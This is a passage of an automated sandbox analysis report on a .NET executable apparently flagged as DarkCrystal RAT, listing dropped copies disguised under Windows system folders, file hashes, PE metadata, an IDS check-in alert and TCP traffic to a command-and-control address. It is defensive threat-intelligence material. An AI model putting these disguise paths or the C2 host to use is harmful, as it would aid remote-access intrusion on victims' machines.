                                                                                                                              Entropy (8bit):5.815524227334601
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:zJC7kkwMt7oS2iPlvdDG9YEfuO6uKYmSPSl2xnaQXog3JC:zJC78MqS7VDGP76uJPdRUgI
                                                                                                                              MD5:3CA8E6718E47252A98E4FF2FE4CB7985
                                                                                                                              SHA1:997850CF42CCDE8DFB45B082F4FA16E7761DF84F
                                                                                                                              SHA-256:42398B9FA940037027AC56AEE852D4E6465B91D68C38DD9E13232B66AF806103
                                                                                                                              SHA-512:78EFCB76A8BA8BC5210F1059C3250B91AD27B1E2572281D6E71EE5F498E1766BDC4078495CD934335C23E0139093486A9E92A57EDD5C83FA6E580A9FE507FF7F
                                                                                                                              Malicious:false
                                                                                                                              Preview:aoMzyqZfmZu2mKI9B7ktFMZES4mQr7BkFRfBOD0CQmJXtxcMWjzpr9LOPHg3EJxpXKxUoGu8HidcCBUfcZ4IHV2FGRwHh67GyeAj9HiPy1iJgtLNwBbpPpiCSrOXTnbLkWohBvfU1oTPxtjXFjUffS1J68QS2K6LaWiKEnMBfGylWSOjI1RuT5qSeflCeMbqrHzaKYSbWSAYePwntrKB3M2eqPpjCJhSoH4OdyYtjzXA5RyPs7TwCaxfPUt5ttZNvrtWViK5TacDy1jZaa0F0uQO

                                                                                                                              C:\Windows\GameBarPresenceWriter\services.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3163910
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              MD5:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              SHA1:9571472C5D0899E517E1C1F84C6C05DFD2ABB2B5
                                                                                                                              SHA-256:9C2AD3D80258AF2508987D952DD5A7744BEDBDD16260E4F76412EA6696774285
                                                                                                                              SHA-512:439D108D086E6231513A7D40E01EA9C8D1B0D9948C9412F2828F694D94CCFA64E98D8A6956464CCCB632BB072AAE4E3C00154733BC3AF97A11CD7A57F0B0FB10
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                                                                              C:\Windows\GameBarPresenceWriter\services.exe:Zone.Identifier

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:true
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                              C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3163910
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              MD5:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              SHA1:9571472C5D0899E517E1C1F84C6C05DFD2ABB2B5
                                                                                                                              SHA-256:9C2AD3D80258AF2508987D952DD5A7744BEDBDD16260E4F76412EA6696774285
                                                                                                                              SHA-512:439D108D086E6231513A7D40E01EA9C8D1B0D9948C9412F2828F694D94CCFA64E98D8A6956464CCCB632BB072AAE4E3C00154733BC3AF97A11CD7A57F0B0FB10
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                                                                              C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe:Zone.Identifier

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:false
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                              C:\Windows\twain_32\d766a8fd310fca

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with very long lines (818), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):818
                                                                                                                              Entropy (8bit):5.924016653700528
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:EUUoOPyb8v/TDn9szFLDoYzKsyhN6iD9oCjmugpKQ9tL:EUUoO6b49szBoYGFhnDxmfNj
                                                                                                                              MD5:EF2F3027760FB88DB2C9FB587BA69B41
                                                                                                                              SHA1:E72B069DCF6AA7FD60397E4D7D18714EF47FED21
                                                                                                                              SHA-256:3C7AB06B4E292DA5A03933BA42988FB07B8CF3AED269C6C6D0C0BF43C925C21F
                                                                                                                              SHA-512:26054CC58E36961D99DBA1C67005DAE5C8DD7636BB1D4CD47F99F42CD9FD7791C3DE80EC5437264D7E60225382F72AB21D0EDDB1A3BF18546E7079E386052BAF
                                                                                                                              Malicious:false
                                                                                                                              Preview:LkN5LmwvlHqBTAgfYm1eWjI4Pqm0ej6NxSdtTKq845AuRe8i5HasFCblcSpfA5RCKdOBhwLN52kbiYmurD5XJOIu01QBeK89n8jyQ7BJ5MwNc9DEp5y6A326UeKpfKsv3kyjyyetBvb6c5R1yMVjWB8uGndwxVnveAT2LdP1bE5Ob6dZMS0SyJY2mDdLUr6qIqcbmZpV7eHSGuSKJEjeeU6UmaPHAEgtHPFvdCxxnfVUBFv1vTBQIbLytHzLJhV27YK1ohqHRv198mTgoYWqCQlpDRBVNloFKcWn54NNm48WkLzHySgvLo0rxfxWfU3pHvygPqluKIDIROF2c3h4E24gmpzaG1sSBTOzXT1HrwkCksZiZ53lx8kP0S3k0LnTavH89PeJCZNSS254PRAL7GfCs98EZRRgIQlzlbiKaujXvS68X9VjKcWUPEQARatvIqJBQGTxs0uMgIQZC9ra5sVq4RjgKi2AAyOEJ5sQph0UrJxHy07StTzaVcH8hwnK7uMs3MQHRauY1B8udbsTkkRr8ytqytt34pW76FOlkzASibiUdWeFETkXdftEcjThq1dMoBxYMGtuj8IhPZMbOoylF9ebWJJBgdlr7WqciG38jzxeWLzDW1SCD2GohWCC7sOGXbj3tu3Iu0BQL9EKUFooKinFPB5ME0A1krH5m5Um8KRM00chR1r1Dj5yxdnrzrD4zJpe2JiZvCpAQbPZiX4NIJyAwTHISmwRGXXqK8oITSGB44hWOOJbw0wqVorjBZHIPY33DiOjtw4zCwG1vv4EdUfQlrVgQEG3L8vgBnTp9jsA66

                                                                                                                              \Device\Null

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\w32tm.exe
                                                                                                                              File Type:ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):151
                                                                                                                              Entropy (8bit):4.824038610531724
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:VLV993J+miJWEoJ8FXlaKy6XaNvo41Nvj:Vx993DEUaLV47
                                                                                                                              MD5:0AB6577C3D92C4724BAB09B2D4A421AB
                                                                                                                              SHA1:B7AA3111CD54B430AC00FA77711302DE7361F5A8
                                                                                                                              SHA-256:FA98CFC4659B678A5121398475A403A1F2742ABCF8038262D072733EEA44352F
                                                                                                                              SHA-512:D43040B6ECE1D4F9282A965EE8B7A6FF04DD8A48273B2F6541D0D7C1D445CCF07B9E60987446D7E18A297FA0B0AB7F6800A5CF45B60967500FD5009FEE182537
                                                                                                                              Malicious:false
                                                                                                                              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 26/12/2024 13:04:34..13:04:34, error: 0x80072746.13:04:39, error: 0x80072746.

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:Z4D3XAZ2jB.exe
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5:0a5d9cd0a4b6abdbb272262811774a8d
                                                                                                                              SHA1:9571472c5d0899e517e1c1f84c6c05dfd2abb2b5
                                                                                                                              SHA256:9c2ad3d80258af2508987d952dd5a7744bedbdd16260e4f76412ea6696774285
                                                                                                                              SHA512:439d108d086e6231513a7d40e01ea9c8d1b0d9948c9412f2828f694d94ccfa64e98d8a6956464cccb632bb072aae4e3c00154733bc3af97a11cd7a57f0b0fb10
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              TLSH:97E533C19638C452EEAE2A76E501804FA17CBBA04D4D4D3F73E153DFD9B74E685ACA02
                                                                                                                              File Content Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`.............................

                                                                                                                              File Icon

                                                                                                                              Icon Hash:90cececece8e8eb0

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x402e5e
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al

                                                                                                                              Data Directories

                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2e0c0x4f.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x370.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x20000xe640x10006b17f20c45d1294fc266eb14df869af7False0.552978515625data5.315832583359095IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rsrc0x40000x3700x40084c5330df637369dd4da3d84a91b8d66False0.3759765625data2.854832632722979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0x60000xc0x200bdc0546adfb3b2dd2fed0ee2248951a7False1.005859375data6.526889622005003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_VERSION0x40580x318data0.44823232323232326

                                                                                                                              Imports

                                                                                                                              DLLImport
                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                              Network Behavior

                                                                                                                              Suricata IDS Alerts

                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-12-26T17:17:12.161494+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449730104.21.93.16280TCP

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 26, 2024 17:17:10.654953003 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:10.774565935 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:10.774843931 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:10.795922995 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:10.916369915 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:11.175096989 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:11.294652939 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:11.952718019 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:12.161494017 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:12.211527109 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:12.211620092 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:12.211715937 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:12.255414963 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:12.326740026 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:12.375389099 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:12.446384907 CET8049731104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:12.449307919 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:12.449456930 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:12.569185972 CET8049731104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:12.588042021 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:12.590327024 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:12.710067987 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:12.802196980 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:12.921941042 CET8049731104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:12.921957016 CET8049731104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:12.921972990 CET8049731104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:13.083152056 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:13.106422901 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:13.225995064 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:13.439193964 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:13.441595078 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:13.561105967 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:13.561217070 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:13.626831055 CET8049731104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:13.802160025 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:13.878189087 CET8049731104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:13.934827089 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:14.099111080 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.180829048 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.647872925 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.648757935 CET4973580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.678751945 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.767754078 CET8049730104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:14.767808914 CET4973080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.768316031 CET8049735104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:14.768404961 CET4973580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.768544912 CET4973580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.798758984 CET8049731104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:14.798851013 CET4973180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:14.888022900 CET8049735104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:14.967722893 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.036266088 CET4973580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.087363005 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.087421894 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.087529898 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.193871975 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.199681044 CET8049735104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.206943035 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.314383030 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.314455986 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.314666033 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.434160948 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.443037987 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.563760996 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.563800097 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.670962095 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.738765955 CET8049735104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.738822937 CET4973580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:15.790544987 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.790563107 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:15.790611982 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.264548063 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.411495924 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:16.492837906 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.545506954 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.599003077 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:16.661506891 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:16.752651930 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.962876081 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:16.962925911 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.482254982 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.482315063 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.484941006 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.574867010 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.602263927 CET8049736104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.602332115 CET4973680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.602722883 CET8049738104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.602761030 CET4973880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.604527950 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.604589939 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.604784966 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.695684910 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.695765018 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.695915937 CET4974180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:17.726121902 CET8049740104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.815511942 CET8049741104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:17.958554029 CET4974080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:18.052509069 CET4974180192.168.2.4104.21.93.162
